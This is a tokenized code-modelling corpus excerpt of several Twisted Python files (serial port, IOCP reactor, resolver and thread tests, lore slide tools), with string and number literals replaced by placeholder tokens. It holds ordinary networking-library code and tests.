) <EOL> class EfficiencyTestCase ( unittest . TestCase ) : <EOL> todo = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def setUp ( self ) : <EOL> self . attrs = helper . CharacterAttribute ( ) <EOL> def testComplexStructure ( self ) : <EOL> output = A . normal [ <EOL> A . bold [ <EOL> A . bg . cyan [ <EOL> A . fg . red [ <EOL> "<STR_LIT>" , <EOL> A . blink [ <EOL> "<STR_LIT>" ] , <EOL> - A . bold [ <EOL> "<STR_LIT>" ] ] , <EOL> A . fg . green [ <EOL> "<STR_LIT>" ] ] ] ] <EOL> self . assertEqual ( <EOL> text . flatten ( output , self . attrs ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def testNesting ( self ) : <EOL> self . assertEqual ( <EOL> text . flatten ( A . bold [ '<STR_LIT>' , A . underline [ '<STR_LIT>' ] ] , self . attrs ) , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> text . flatten ( <EOL> A . bold [ A . reverseVideo [ '<STR_LIT>' , A . normal [ '<STR_LIT>' ] , '<STR_LIT:.>' ] ] , <EOL> self . attrs ) , <EOL> '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import os , errno <EOL> import serial <EOL> from serial import PARITY_NONE , PARITY_EVEN , PARITY_ODD <EOL> from serial import STOPBITS_ONE , STOPBITS_TWO <EOL> from serial import FIVEBITS , SIXBITS , SEVENBITS , EIGHTBITS <EOL> from serialport import BaseSerialPort <EOL> from twisted . internet import abstract , fdesc , main <EOL> class SerialPort ( BaseSerialPort , abstract . FileDescriptor ) : <EOL> """<STR_LIT>""" <EOL> connected = <NUM_LIT:1> <EOL> def __init__ ( self , protocol , deviceNameOrPortNumber , reactor , <EOL> baudrate = <NUM_LIT> , bytesize = EIGHTBITS , parity = PARITY_NONE , <EOL> stopbits = STOPBITS_ONE , timeout = <NUM_LIT:0> , xonxoff = <NUM_LIT:0> , rtscts = <NUM_LIT:0> ) : <EOL> abstract . FileDescriptor . __init__ ( self , reactor ) <EOL> self . _serial = self . _serialFactory ( <EOL> deviceNameOrPortNumber , baudrate = baudrate , bytesize = bytesize , <EOL> parity = parity , stopbits = stopbits , timeout = timeout , <EOL> xonxoff = xonxoff , rtscts = rtscts ) <EOL> self . reactor = reactor <EOL> self . flushInput ( ) <EOL> self . flushOutput ( ) <EOL> self . protocol = protocol <EOL> self . protocol . makeConnection ( self ) <EOL> self . startReading ( ) <EOL> def fileno ( self ) : <EOL> return self . _serial . fd <EOL> def writeSomeData ( self , data ) : <EOL> """<STR_LIT>""" <EOL> return fdesc . writeToFD ( self . fileno ( ) , data ) <EOL> def doRead ( self ) : <EOL> """<STR_LIT>""" <EOL> return fdesc . readFromFD ( self . fileno ( ) , self . protocol . dataReceived ) <EOL> def connectionLost ( self , reason ) : <EOL> """<STR_LIT>""" <EOL> abstract . FileDescriptor . connectionLost ( self , reason ) <EOL> self . _serial . close ( ) <EOL> self . protocol . connectionLost ( reason ) </s>
<s> """<STR_LIT>""" <EOL> import warnings , socket , sys <EOL> from zope . interface import implements <EOL> from twisted . internet import base , interfaces , main , error <EOL> from twisted . python import log , failure <EOL> from twisted . internet . _dumbwin32proc import Process <EOL> from twisted . internet . win32eventreactor import _ThreadedWin32EventsMixin <EOL> from twisted . internet . iocpreactor import iocpsupport as _iocp <EOL> from twisted . internet . iocpreactor . const import WAIT_TIMEOUT <EOL> from twisted . internet . iocpreactor import tcp , udp <EOL> try : <EOL> from twisted . protocols . tls import TLSMemoryBIOFactory <EOL> except ImportError : <EOL> TLSMemoryBIOFactory = None <EOL> _extraInterfaces = ( ) <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> _extraInterfaces = ( interfaces . IReactorSSL , ) <EOL> from twisted . python . compat import set <EOL> MAX_TIMEOUT = <NUM_LIT> <EOL> EVENTS_PER_LOOP = <NUM_LIT:1000> <EOL> KEY_NORMAL , KEY_WAKEUP = range ( <NUM_LIT:2> ) <EOL> _NO_GETHANDLE = error . ConnectionFdescWentAway ( <EOL> '<STR_LIT>' ) <EOL> _NO_FILEDESC = error . ConnectionFdescWentAway ( '<STR_LIT>' ) <EOL> class IOCPReactor ( base . _SignalReactorMixin , base . ReactorBase , <EOL> _ThreadedWin32EventsMixin ) : <EOL> implements ( interfaces . IReactorTCP , interfaces . IReactorUDP , <EOL> interfaces . IReactorMulticast , interfaces . IReactorProcess , <EOL> * _extraInterfaces ) <EOL> port = None <EOL> def __init__ ( self ) : <EOL> base . ReactorBase . __init__ ( self ) <EOL> self . port = _iocp . CompletionPort ( ) <EOL> self . handles = set ( ) <EOL> def addActiveHandle ( self , handle ) : <EOL> self . handles . add ( handle ) <EOL> def removeActiveHandle ( self , handle ) : <EOL> self . handles . discard ( handle ) <EOL> def doIteration ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> processed_events = <NUM_LIT:0> <EOL> if timeout is None : <EOL> timeout = MAX_TIMEOUT <EOL> else : <EOL> timeout = min ( MAX_TIMEOUT , int ( <NUM_LIT:1000> * timeout ) ) <EOL> rc , bytes , key , evt = self . port . getEvent ( timeout ) <EOL> while <NUM_LIT:1> : <EOL> if rc == WAIT_TIMEOUT : <EOL> break <EOL> if key != KEY_WAKEUP : <EOL> assert key == KEY_NORMAL <EOL> log . callWithLogger ( evt . owner , self . _callEventCallback , <EOL> rc , bytes , evt ) <EOL> processed_events += <NUM_LIT:1> <EOL> if processed_events >= EVENTS_PER_LOOP : <EOL> break <EOL> rc , bytes , key , evt = self . port . getEvent ( <NUM_LIT:0> ) <EOL> def _callEventCallback ( self , rc , bytes , evt ) : <EOL> owner = evt . owner <EOL> why = None <EOL> try : <EOL> evt . callback ( rc , bytes , evt ) <EOL> handfn = getattr ( owner , '<STR_LIT>' , None ) <EOL> if not handfn : <EOL> why = _NO_GETHANDLE <EOL> elif handfn ( ) == - <NUM_LIT:1> : <EOL> why = _NO_FILEDESC <EOL> if why : <EOL> return <EOL> except : <EOL> why = sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> log . err ( ) <EOL> if why : <EOL> owner . loseConnection ( failure . Failure ( why ) ) <EOL> def installWaker ( self ) : <EOL> pass <EOL> def wakeUp ( self ) : <EOL> self . port . postEvent ( <NUM_LIT:0> , KEY_WAKEUP , None ) <EOL> def registerHandle ( self , handle ) : <EOL> self . port . addHandle ( handle , KEY_NORMAL ) <EOL> def createSocket ( self , af , stype ) : <EOL> skt = socket . socket ( af , stype ) <EOL> self . registerHandle ( skt . fileno ( ) ) <EOL> return skt <EOL> def listenTCP ( self , port , factory , backlog = <NUM_LIT:50> , interface = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> p = tcp . Port ( port , factory , backlog , interface , self ) <EOL> p . startListening ( ) <EOL> return p <EOL> def connectTCP ( self , host , port , factory , timeout = <NUM_LIT:30> , bindAddress = None ) : <EOL> """<STR_LIT>""" <EOL> c = tcp . Connector ( host , port , factory , timeout , bindAddress , self ) <EOL> c . connect ( ) <EOL> return c <EOL> if TLSMemoryBIOFactory is not None : <EOL> def listenSSL ( self , port , factory , contextFactory , backlog = <NUM_LIT:50> , interface = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> port = self . listenTCP ( <EOL> port , <EOL> TLSMemoryBIOFactory ( contextFactory , False , factory ) , <EOL> backlog , interface ) <EOL> port . _type = '<STR_LIT>' <EOL> return port <EOL> def connectSSL ( self , host , port , factory , contextFactory , timeout = <NUM_LIT:30> , bindAddress = None ) : <EOL> """<STR_LIT>""" <EOL> return self . connectTCP ( <EOL> host , port , <EOL> TLSMemoryBIOFactory ( contextFactory , True , factory ) , <EOL> timeout , bindAddress ) <EOL> else : <EOL> def listenSSL ( self , port , factory , contextFactory , backlog = <NUM_LIT:50> , interface = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def connectSSL ( self , host , port , factory , contextFactory , timeout = <NUM_LIT:30> , bindAddress = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def listenUDP ( self , port , protocol , interface = '<STR_LIT>' , maxPacketSize = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> p = udp . Port ( port , protocol , interface , maxPacketSize , self ) <EOL> p . startListening ( ) <EOL> return p <EOL> def listenMulticast ( self , port , protocol , interface = '<STR_LIT>' , maxPacketSize = <NUM_LIT> , <EOL> listenMultiple = False ) : <EOL> """<STR_LIT>""" <EOL> p = udp . MulticastPort ( port , protocol , interface , maxPacketSize , self , <EOL> listenMultiple ) <EOL> p . startListening ( ) <EOL> return p <EOL> def spawnProcess ( self , processProtocol , executable , args = ( ) , env = { } , <EOL> path = None , uid = None , gid = None , usePTY = <NUM_LIT:0> , childFDs = None ) : <EOL> """<STR_LIT>""" <EOL> if uid is not None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if gid is not None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if usePTY : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if childFDs is not None : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> args , env = self . _checkProcessArgs ( args , env ) <EOL> return Process ( self , processProtocol , executable , args , env , path ) <EOL> def removeAll ( self ) : <EOL> res = list ( self . handles ) <EOL> self . handles . clear ( ) <EOL> return res <EOL> def install ( ) : <EOL> r = IOCPReactor ( ) <EOL> main . installReactor ( r ) <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import socket <EOL> from Queue import Queue <EOL> from zope . interface import implements <EOL> from twisted . python . threadpool import ThreadPool <EOL> from twisted . python . util import setIDFunction <EOL> from twisted . internet . interfaces import IReactorTime , IReactorThreads <EOL> from twisted . internet . error import DNSLookupError <EOL> from twisted . internet . base import ThreadedResolver , DelayedCall <EOL> from twisted . internet . task import Clock <EOL> from twisted . trial . unittest import TestCase <EOL> class FakeReactor ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( IReactorTime , IReactorThreads ) <EOL> def __init__ ( self ) : <EOL> self . _clock = Clock ( ) <EOL> self . callLater = self . _clock . callLater <EOL> self . _threadpool = ThreadPool ( ) <EOL> self . _threadpool . start ( ) <EOL> self . getThreadPool = lambda : self . _threadpool <EOL> self . _threadCalls = Queue ( ) <EOL> def callFromThread ( self , f , * args , ** kwargs ) : <EOL> self . _threadCalls . put ( ( f , args , kwargs ) ) <EOL> def _runThreadCalls ( self ) : <EOL> f , args , kwargs = self . _threadCalls . get ( ) <EOL> f ( * args , ** kwargs ) <EOL> def _stop ( self ) : <EOL> self . _threadpool . stop ( ) <EOL> class ThreadedResolverTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_success ( self ) : <EOL> """<STR_LIT>""" <EOL> ip = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> timeout = <NUM_LIT:30> <EOL> reactor = FakeReactor ( ) <EOL> self . addCleanup ( reactor . _stop ) <EOL> lookedUp = [ ] <EOL> resolvedTo = [ ] <EOL> def fakeGetHostByName ( name ) : <EOL> lookedUp . append ( name ) <EOL> return ip <EOL> self . patch ( socket , '<STR_LIT>' , fakeGetHostByName ) <EOL> resolver = ThreadedResolver ( reactor ) <EOL> d = resolver . getHostByName ( name , ( timeout , ) ) <EOL> d . addCallback ( resolvedTo . append ) <EOL> reactor . _runThreadCalls ( ) <EOL> self . assertEqual ( lookedUp , [ name ] ) <EOL> self . assertEqual ( resolvedTo , [ ip ] ) <EOL> reactor . _clock . advance ( timeout + <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . _clock . calls , [ ] ) <EOL> def test_failure ( self ) : <EOL> """<STR_LIT>""" <EOL> timeout = <NUM_LIT:30> <EOL> reactor = FakeReactor ( ) <EOL> self . addCleanup ( reactor . _stop ) <EOL> def fakeGetHostByName ( name ) : <EOL> raise IOError ( "<STR_LIT>" ) <EOL> self . patch ( socket , '<STR_LIT>' , fakeGetHostByName ) <EOL> failedWith = [ ] <EOL> resolver = ThreadedResolver ( reactor ) <EOL> d = resolver . getHostByName ( "<STR_LIT>" , ( timeout , ) ) <EOL> self . assertFailure ( d , DNSLookupError ) <EOL> d . addCallback ( failedWith . append ) <EOL> reactor . _runThreadCalls ( ) <EOL> self . assertEqual ( len ( failedWith ) , <NUM_LIT:1> ) <EOL> reactor . _clock . advance ( timeout + <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . _clock . calls , [ ] ) <EOL> def test_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> timeout = <NUM_LIT:10> <EOL> reactor = FakeReactor ( ) <EOL> self . addCleanup ( reactor . _stop ) <EOL> result = Queue ( ) <EOL> def fakeGetHostByName ( name ) : <EOL> raise result . get ( ) <EOL> self . patch ( socket , '<STR_LIT>' , fakeGetHostByName ) <EOL> failedWith = [ ] <EOL> resolver = ThreadedResolver ( reactor ) <EOL> d = resolver . getHostByName ( "<STR_LIT>" , ( timeout , ) ) <EOL> self . assertFailure ( d , DNSLookupError ) <EOL> d . addCallback ( failedWith . append ) <EOL> reactor . _clock . advance ( timeout - <NUM_LIT:1> ) <EOL> self . assertEqual ( failedWith , [ ] ) <EOL> reactor . _clock . advance ( <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( failedWith ) , <NUM_LIT:1> ) <EOL> result . put ( IOError ( "<STR_LIT>" ) ) <EOL> class DelayedCallTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _getDelayedCallAt ( self , time ) : <EOL> """<STR_LIT>""" <EOL> def noop ( call ) : <EOL> pass <EOL> return DelayedCall ( time , lambda : None , ( ) , { } , noop , noop , None ) <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . zero = self . _getDelayedCallAt ( <NUM_LIT:0> ) <EOL> self . one = self . _getDelayedCallAt ( <NUM_LIT:1> ) <EOL> def test_str ( self ) : <EOL> """<STR_LIT>""" <EOL> def nothing ( ) : <EOL> pass <EOL> dc = DelayedCall ( <NUM_LIT:12> , nothing , ( <NUM_LIT:3> , ) , { "<STR_LIT:A>" : <NUM_LIT:5> } , None , None , lambda : <NUM_LIT> ) <EOL> ids = { dc : <NUM_LIT:200> } <EOL> def fakeID ( obj ) : <EOL> try : <EOL> return ids [ obj ] <EOL> except ( TypeError , KeyError ) : <EOL> return id ( obj ) <EOL> self . addCleanup ( setIDFunction , setIDFunction ( fakeID ) ) <EOL> self . assertEqual ( <EOL> str ( dc ) , <EOL> "<STR_LIT>" ) <EOL> def test_lt ( self ) : <EOL> """<STR_LIT>""" <EOL> zero , one = self . zero , self . one <EOL> self . assertTrue ( zero < one ) <EOL> self . assertFalse ( one < zero ) <EOL> self . assertFalse ( zero < zero ) <EOL> self . assertFalse ( one < one ) <EOL> def test_le ( self ) : <EOL> """<STR_LIT>""" <EOL> zero , one = self . zero , self . one <EOL> self . assertTrue ( zero <= one ) <EOL> self . assertFalse ( one <= zero ) <EOL> self . assertTrue ( zero <= zero ) <EOL> self . assertTrue ( one <= one ) <EOL> def test_gt ( self ) : <EOL> """<STR_LIT>""" <EOL> zero , one = self . zero , self . one <EOL> self . assertTrue ( one > zero ) <EOL> self . assertFalse ( zero > one ) <EOL> self . assertFalse ( zero > zero ) <EOL> self . assertFalse ( one > one ) <EOL> def test_ge ( self ) : <EOL> """<STR_LIT>""" <EOL> zero , one = self . zero , self . one <EOL> self . assertTrue ( one >= zero ) <EOL> self . assertFalse ( zero >= one ) <EOL> self . assertTrue ( zero >= zero ) <EOL> self . assertTrue ( one >= one ) <EOL> def test_eq ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . zero == self . one ) <EOL> self . assertTrue ( self . zero == self . zero ) <EOL> self . assertTrue ( self . one == self . one ) <EOL> def test_ne ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( self . zero != self . one ) <EOL> self . assertFalse ( self . zero != self . zero ) <EOL> self . assertFalse ( self . one != self . one ) </s>
<s> """<STR_LIT>""" <EOL> __metaclass__ = type <EOL> from weakref import ref <EOL> import gc , threading <EOL> from twisted . python . threadable import isInIOThread <EOL> from twisted . internet . test . reactormixins import ReactorBuilder <EOL> from twisted . python . threadpool import ThreadPool <EOL> from twisted . internet . interfaces import IReactorThreads <EOL> class ThreadTestsBuilder ( ReactorBuilder ) : <EOL> """<STR_LIT>""" <EOL> requiredInterfaces = ( IReactorThreads , ) <EOL> def test_getThreadPool ( self ) : <EOL> """<STR_LIT>""" <EOL> state = [ ] <EOL> reactor = self . buildReactor ( ) <EOL> pool = reactor . getThreadPool ( ) <EOL> self . assertIsInstance ( pool , ThreadPool ) <EOL> self . assertFalse ( <EOL> pool . started , "<STR_LIT>" ) <EOL> def f ( ) : <EOL> state . append ( pool . started ) <EOL> state . append ( pool . joined ) <EOL> reactor . stop ( ) <EOL> reactor . callWhenRunning ( f ) <EOL> self . runReactor ( reactor , <NUM_LIT:2> ) <EOL> self . assertTrue ( <EOL> state [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> self . assertFalse ( <EOL> state [ <NUM_LIT:1> ] , "<STR_LIT>" ) <EOL> self . assertTrue ( <EOL> pool . joined , <EOL> "<STR_LIT>" ) <EOL> def test_suggestThreadPoolSize ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> reactor . suggestThreadPoolSize ( <NUM_LIT> ) <EOL> pool = reactor . getThreadPool ( ) <EOL> self . assertEqual ( pool . max , <NUM_LIT> ) <EOL> def test_delayedCallFromThread ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> def threadCall ( ) : <EOL> reactor . stop ( ) <EOL> reactor . callLater ( <NUM_LIT:0> , reactor . callFromThread , threadCall ) <EOL> before = reactor . seconds ( ) <EOL> self . runReactor ( reactor , <NUM_LIT> ) <EOL> after = reactor . seconds ( ) <EOL> self . assertTrue ( after - before < <NUM_LIT:30> ) <EOL> def test_callFromThread ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> result = [ ] <EOL> def threadCall ( ) : <EOL> result . append ( threading . currentThread ( ) ) <EOL> reactor . stop ( ) <EOL> reactor . callLater ( <NUM_LIT:0> , reactor . callInThread , <EOL> reactor . callFromThread , threadCall ) <EOL> self . runReactor ( reactor , <NUM_LIT:5> ) <EOL> self . assertEquals ( result , [ threading . currentThread ( ) ] ) <EOL> def test_stopThreadPool ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> threadpool = ref ( reactor . getThreadPool ( ) ) <EOL> reactor . callWhenRunning ( reactor . stop ) <EOL> self . runReactor ( reactor ) <EOL> gc . collect ( ) <EOL> self . assertIdentical ( threadpool ( ) , None ) <EOL> def test_stopThreadPoolWhenStartedAfterReactorRan ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> threadPoolRefs = [ ] <EOL> def acquireThreadPool ( ) : <EOL> threadPoolRefs . append ( ref ( reactor . getThreadPool ( ) ) ) <EOL> reactor . stop ( ) <EOL> reactor . callWhenRunning ( acquireThreadPool ) <EOL> self . runReactor ( reactor ) <EOL> gc . collect ( ) <EOL> self . assertIdentical ( threadPoolRefs [ <NUM_LIT:0> ] ( ) , None ) <EOL> def test_cleanUpThreadPoolEvenBeforeReactorIsRun ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> threadPoolRef = ref ( reactor . getThreadPool ( ) ) <EOL> reactor . fireSystemEvent ( "<STR_LIT>" ) <EOL> gc . collect ( ) <EOL> self . assertIdentical ( threadPoolRef ( ) , None ) <EOL> def test_isInIOThread ( self ) : <EOL> """<STR_LIT>""" <EOL> results = [ ] <EOL> reactor = self . buildReactor ( ) <EOL> def check ( ) : <EOL> results . append ( isInIOThread ( ) ) <EOL> reactor . stop ( ) <EOL> reactor . callWhenRunning ( check ) <EOL> self . runReactor ( reactor ) <EOL> self . assertEqual ( [ True ] , results ) <EOL> def test_isNotInIOThread ( self ) : <EOL> """<STR_LIT>""" <EOL> results = [ ] <EOL> reactor = self . buildReactor ( ) <EOL> def check ( ) : <EOL> results . append ( isInIOThread ( ) ) <EOL> reactor . callFromThread ( reactor . stop ) <EOL> reactor . callInThread ( check ) <EOL> self . runReactor ( reactor ) <EOL> self . assertEqual ( [ False ] , results ) <EOL> globals ( ) . update ( ThreadTestsBuilder . makeTestCaseClasses ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from xml . dom import minidom as dom <EOL> import os . path , re <EOL> from cStringIO import StringIO <EOL> from twisted . lore import default <EOL> from twisted . web import domhelpers <EOL> from twisted . python import text <EOL> from twisted . lore . latex import BaseLatexSpitter , LatexSpitter , processFile <EOL> from twisted . lore . latex import getLatexText , HeadingLatexSpitter <EOL> from twisted . lore . tree import getHeaders <EOL> from twisted . lore . tree import removeH1 , fixAPI , fontifyPython <EOL> from twisted . lore . tree import addPyListings , addHTMLListings , setTitle <EOL> hacked_entities = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> entities = { '<STR_LIT>' : '<STR_LIT:&>' , '<STR_LIT>' : '<STR_LIT:>>' , '<STR_LIT>' : '<STR_LIT:<>' , '<STR_LIT>' : '<STR_LIT:">' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> class MagicpointOutput ( BaseLatexSpitter ) : <EOL> bulletDepth = <NUM_LIT:0> <EOL> def writeNodeData ( self , node ) : <EOL> buf = StringIO ( ) <EOL> getLatexText ( node , buf . write , entities = hacked_entities ) <EOL> data = buf . getvalue ( ) . rstrip ( ) . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) <EOL> self . writer ( re . sub ( '<STR_LIT>' , '<STR_LIT:U+0020>' , data ) ) <EOL> def visitNode_title ( self , node ) : <EOL> self . title = domhelpers . getNodeText ( node ) <EOL> def visitNode_body ( self , node ) : <EOL> self . fontStack = [ ( '<STR_LIT>' , None ) ] <EOL> self . writer ( self . start_h2 ) <EOL> self . writer ( self . title ) <EOL> self . writer ( self . end_h2 ) <EOL> self . writer ( '<STR_LIT>' ) <EOL> for authorNode in domhelpers . findElementsWithAttribute ( node , '<STR_LIT:class>' , '<STR_LIT>' ) : <EOL> getLatexText ( authorNode , self . writer , entities = entities ) <EOL> self . writer ( '<STR_LIT:\n>' ) <EOL> self . writer ( self . start_h2 ) <EOL> self . writer ( self . title ) <EOL> self . writer ( self . end_h2 ) <EOL> for element in getHeaders ( node ) : <EOL> level = int ( element . tagName [ <NUM_LIT:1> ] ) - <NUM_LIT:1> <EOL> self . writer ( level * '<STR_LIT:\t>' ) <EOL> self . writer ( domhelpers . getNodeText ( element ) ) <EOL> self . writer ( '<STR_LIT:\n>' ) <EOL> self . visitNodeDefault ( node ) <EOL> def visitNode_div_author ( self , node ) : <EOL> pass <EOL> def visitNode_div_pause ( self , node ) : <EOL> self . writer ( '<STR_LIT>' ) <EOL> def visitNode_pre ( self , node ) : <EOL> buf = StringIO ( ) <EOL> getLatexText ( node , buf . write , entities = entities ) <EOL> data = buf . getvalue ( ) <EOL> data = text . removeLeadingTrailingBlanks ( data ) <EOL> lines = data . split ( '<STR_LIT:\n>' ) <EOL> self . fontStack . append ( ( '<STR_LIT>' , <NUM_LIT:4> ) ) <EOL> self . writer ( '<STR_LIT:%>' + self . fontName ( ) + '<STR_LIT:\n>' ) <EOL> for line in lines : <EOL> self . writer ( '<STR_LIT:U+0020>' + line + '<STR_LIT:\n>' ) <EOL> del self . fontStack [ - <NUM_LIT:1> ] <EOL> self . writer ( '<STR_LIT:%>' + self . fontName ( ) + '<STR_LIT:\n>' ) <EOL> def visitNode_ul ( self , node ) : <EOL> if self . bulletDepth > <NUM_LIT:0> : <EOL> self . writer ( self . _start_ul ) <EOL> self . bulletDepth += <NUM_LIT:1> <EOL> self . start_li = self . _start_li * self . bulletDepth <EOL> self . visitNodeDefault ( node ) <EOL> self . bulletDepth -= <NUM_LIT:1> <EOL> self . start_li = self . _start_li * self . bulletDepth <EOL> def visitNode_strong ( self , node ) : <EOL> self . doFont ( node , '<STR_LIT>' ) <EOL> def visitNode_em ( self , node ) : <EOL> self . doFont ( node , '<STR_LIT>' ) <EOL> def visitNode_code ( self , node ) : <EOL> self . doFont ( node , '<STR_LIT>' ) <EOL> def doFont ( self , node , style ) : <EOL> self . fontStack . append ( ( style , None ) ) <EOL> self . writer ( '<STR_LIT>' + self . fontName ( ) + '<STR_LIT:\n>' ) <EOL> self . visitNodeDefault ( node ) <EOL> del self . fontStack [ - <NUM_LIT:1> ] <EOL> self . writer ( '<STR_LIT>' + self . fontName ( ) + '<STR_LIT:\n>' ) <EOL> def fontName ( self ) : <EOL> names = [ x [ <NUM_LIT:0> ] for x in self . fontStack ] <EOL> if '<STR_LIT>' in names : <EOL> name = '<STR_LIT>' <EOL> else : <EOL> name = '<STR_LIT>' <EOL> if '<STR_LIT>' in names : <EOL> name += '<STR_LIT>' <EOL> if '<STR_LIT>' in names : <EOL> name += '<STR_LIT>' <EOL> if name == '<STR_LIT>' : <EOL> name = '<STR_LIT>' <EOL> sizes = [ x [ <NUM_LIT:1> ] for x in self . fontStack ] <EOL> sizes . reverse ( ) <EOL> for size in sizes : <EOL> if size : <EOL> return '<STR_LIT>' % ( name , size ) <EOL> return '<STR_LIT>' % name <EOL> start_h2 = "<STR_LIT>" <EOL> end_h2 = '<STR_LIT>' <EOL> _start_ul = '<STR_LIT:\n>' <EOL> _start_li = "<STR_LIT:\t>" <EOL> end_li = "<STR_LIT:\n>" <EOL> def convertFile ( filename , outputter , template , ext = "<STR_LIT>" ) : <EOL> fout = open ( os . path . splitext ( filename ) [ <NUM_LIT:0> ] + ext , '<STR_LIT:w>' ) <EOL> fout . write ( open ( template ) . read ( ) ) <EOL> spitter = outputter ( fout . write , os . path . dirname ( filename ) , filename ) <EOL> fin = open ( filename ) <EOL> processFile ( spitter , fin ) <EOL> fin . close ( ) <EOL> fout . close ( ) <EOL> def splitIntoSlides ( document ) : <EOL> body = domhelpers . findNodesNamed ( document , '<STR_LIT:body>' ) [ <NUM_LIT:0> ] <EOL> slides = [ ] <EOL> slide = [ ] <EOL> title = '<STR_LIT>' <EOL> for child in body . childNodes : <EOL> if isinstance ( child , dom . Element ) and child . tagName == '<STR_LIT>' : <EOL> if slide : <EOL> slides . append ( ( title , slide ) ) <EOL> slide = [ ] <EOL> title = domhelpers . getNodeText ( child ) <EOL> else : <EOL> slide . append ( child ) <EOL> slides . append ( ( title , slide ) ) <EOL> return slides <EOL> def insertPrevNextLinks ( slides , filename , ext ) : <EOL> for slide in slides : <EOL> for name , offset in ( ( "<STR_LIT>" , - <NUM_LIT:1> ) , ( "<STR_LIT>" , + <NUM_LIT:1> ) ) : <EOL> if ( slide . pos > <NUM_LIT:0> and name == "<STR_LIT>" ) or ( slide . pos < len ( slides ) - <NUM_LIT:1> and name == "<STR_LIT>" ) : <EOL> for node in domhelpers . findElementsWithAttribute ( slide . dom , "<STR_LIT:class>" , name ) : <EOL> if node . tagName == '<STR_LIT:a>' : <EOL> node . setAttribute ( '<STR_LIT>' , '<STR_LIT>' <EOL> % ( filename [ <NUM_LIT:0> ] , slide . pos + offset , ext ) ) <EOL> else : <EOL> text = dom . Text ( ) <EOL> text . data = slides [ slide . pos + offset ] . title <EOL> node . appendChild ( text ) <EOL> else : <EOL> for node in domhelpers . findElementsWithAttribute ( slide . dom , "<STR_LIT:class>" , name ) : <EOL> pos = <NUM_LIT:0> <EOL> for child in node . parentNode . childNodes : <EOL> if child is node : <EOL> del node . parentNode . childNodes [ pos ] <EOL> break <EOL> pos += <NUM_LIT:1> <EOL> class HTMLSlide : <EOL> def __init__ ( self , dom , title , pos ) : <EOL> self . dom = dom <EOL> self . title = title <EOL> self . pos = pos <EOL> def munge ( document , template , linkrel , d , fullpath , ext , url , config ) : <EOL> removeH1 ( document ) <EOL> fixAPI ( document , url ) <EOL> fontifyPython ( document ) <EOL> addPyListings ( document , d ) <EOL> addHTMLListings ( document , d ) <EOL> template = template . cloneNode ( <NUM_LIT:1> ) <EOL> slides = [ ] <EOL> pos = <NUM_LIT:0> <EOL> for title , slide in splitIntoSlides ( document ) : <EOL> t = template . cloneNode ( <NUM_LIT:1> ) <EOL> text = dom . Text ( ) <EOL> text . data = title <EOL> setTitle ( t , [ text ] ) <EOL> tmplbody = domhelpers . findElementsWithAttribute ( t , "<STR_LIT:class>" , "<STR_LIT:body>" ) [ <NUM_LIT:0> ] <EOL> tmplbody . childNodes = slide <EOL> tmplbody . setAttribute ( "<STR_LIT:class>" , "<STR_LIT:content>" ) <EOL> slides . append ( HTMLSlide ( t , title , pos ) ) <EOL> pos += <NUM_LIT:1> <EOL> insertPrevNextLinks ( slides , os . path . splitext ( os . path . basename ( fullpath ) ) , ext ) <EOL> return slides <EOL> from tree import makeSureDirectoryExists <EOL> def getOutputFileName ( originalFileName , outputExtension , index ) : <EOL> return os . path . splitext ( originalFileName ) [ <NUM_LIT:0> ] + '<STR_LIT:->' + str ( index ) + outputExtension <EOL> def doFile ( filename , linkrel , ext , url , templ , options = { } , outfileGenerator = 